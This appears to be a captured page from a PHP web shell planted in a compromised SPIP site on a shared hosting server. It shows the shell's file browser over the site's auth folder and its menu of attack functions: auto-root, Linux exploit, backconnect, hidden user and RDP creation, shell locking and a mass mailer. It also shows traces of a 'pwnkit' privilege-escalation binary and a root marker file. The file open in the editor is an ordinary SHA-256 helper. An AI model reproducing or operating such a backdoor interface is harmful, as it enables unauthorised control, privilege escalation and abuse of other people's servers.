Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
auth /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
ldap.php
9.84
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
sha256.inc.php
702
B
-rw----r--
spip.php
17.02
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sha256.inc.php
<?php /** * Main routine called from an application using this include. * * General usage: * require_once('sha256.inc.php'); * $hashstr = spip_sha256('abc'); * * @param string $str Chaîne dont on veut calculer le SHA * @return string Le SHA de la chaîne */ function spip_sha256($str) { return hash('sha256', $str); } /** * @param string $str Chaîne dont on veut calculer le SHA * @param bool $ig_func * @return string Le SHA de la chaîne * @deprecated 4.0 * @see spip_sha256() */ function _nano_sha256($str, $ig_func = true) { trigger_deprecation('spip', '4.0', 'Using "%s" is deprecated, use "%s" instead', __FUNCTION__, "hash('sha256', ...)"); return spip_sha256($str); }
Close